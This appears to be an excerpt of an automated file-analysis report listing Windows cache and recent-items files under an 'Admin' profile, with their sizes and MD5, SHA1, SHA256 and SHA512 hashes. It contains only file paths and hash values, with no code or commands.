SHA512055428d5d770362e50c0c4353567b0a0b853851b09c96601e245f22f58393dbaebe9650dc38a104ca0fda0fdfebe08a38c3a10746573df2ec0216c55b4814f56
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5bc5b12006ddb73970fe9801862826cff
SHA17f9642a1b48afd56bd2b02c96b6532d52649f461
SHA2560be6a2a6241d47527c5f9ee57a403d4d779af73b883943f42d83ecefbc2a0a0e
SHA512b8f8cd3677887db7b468b89901bf9e10a942c7ab8fb30758faf7fb82d421b0c3aded241edf543ce7bf20b785bad9a7acfd0595d0e83e78e9f034d99b69b9c8a7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5accd814b7a2ebdd8da00b51906ba028a
SHA1e6544725c11ca19a7b57571b3dd1ac888edbee1d
SHA256e840f4d6f88c19e79719cbcc3010e6a662bd1d8ddf1bc39666c65b6f206bb67d
SHA51274b5756bce7fa857bcb772c9c6aee16f7b825fdd68c0565fe57ad41c6639e19f6298b2d4af5698ac2b031a44d8a1cbaf4e504ec2571a850736220224ad0a78fa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD586c204ff927fbc1842ffb0373d655a4e
SHA1ad7e91d3c46bae5de9967802e889c9d0b3fab17a
SHA256be7802a38d83fb6dad0d72c8dfb1fc968cc997a7980bee10a28937516387198b
SHA51291f55f6798a092e1a8e90cda14036287b1da6fc5f1c8f5bf11f7654c2300ca38495458493a1c6ab05b5b8d0e9cdcbf44ad22694934adf0a8392605f86b2041a2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5fc76de31a5e201e092a337a7395f8122
SHA15feacc6bf036a12744d925677fa85632de24d66f
SHA2569eacddbabe451a02e758de959b48f6427d3740ff03a6631978375db6c44d4157
SHA512d778b142a9960d9d285a53d2c3d18590723a980f71d59ec2ebc0088d459bb20c6e21f825f1bbcea1af36e03732455f449cf8682fe904a1e61b7b5fea071ef3c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5bc0f4c41771ecb3e008472f442b61ff0
SHA1154ef4503a9bcbf8f5e70fafb455899f1625f544
SHA2568cee3a6e55095e62aa8d998271482eaaaddaaea7fa1b1d0e4cb6fd2856c5ef73
SHA5124adc87a54310e86fdcc43f67f83e230951e0616301711ea729274d5136b319b2bcd5dbfb1655b82c57a836089514937cf36267e875aeb279aa610c24a1eb0f8d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5b6b876fa1353a098dddbe85d2d4119f2
SHA1fe9fddab97cd6a6d0bcd2188611ef805023f7f2a
SHA2568f2aa61316dd47c4ceca77c2d711cd457ead3caf775820dd53172322c45c8a0a
SHA512095eaf952b46c7d0987b086be7bc8833031bf924afdbd390838e4fe3703cc4b99d8cde7f52f7689a3614a8da1b8d431ce82dd3b60cc649c405ba713fd719d086
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD539f49d4ed91456878a28cf478b95449e
SHA143b68772763650d50e42683d45fe54e508abbd39
SHA25625c3af2ea40cf05660d32f48d0e9e527fa4201496ab42635393c42663dddf07f
SHA512ec91136ba8522610e61c70830a26fdf6244d8b573ef66ba18359e7692d38c9ae4049f32f4d46de463c4409e0df9e385b65b7752c35fe2cbe9a96c2ea7e1422a2
-
Filesize
1KB
MD545a66afa3b07b3143f0d0c3515898bae
SHA1cc5baf0c4d2fc0b034974786f20087e058915693
SHA2568a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6
SHA51204aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c430f6c5215cbe5e659e513bf1d01eb3
SHA1d41910a415d73344885af6ece20eb36425c9ebef
SHA256543876c4b079ce81d3ce223711c9f733f45982a5bb80e244fdbd8a6f9f30bbcc
SHA512d69afe83a55e2455cda85929405eeb9ea42f3ff4833fdfd78e2634676f6d36333eaa0cb43b2d2dac32dfa155f647c1123d9417471696d0a4a77f227b1d737f7d
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e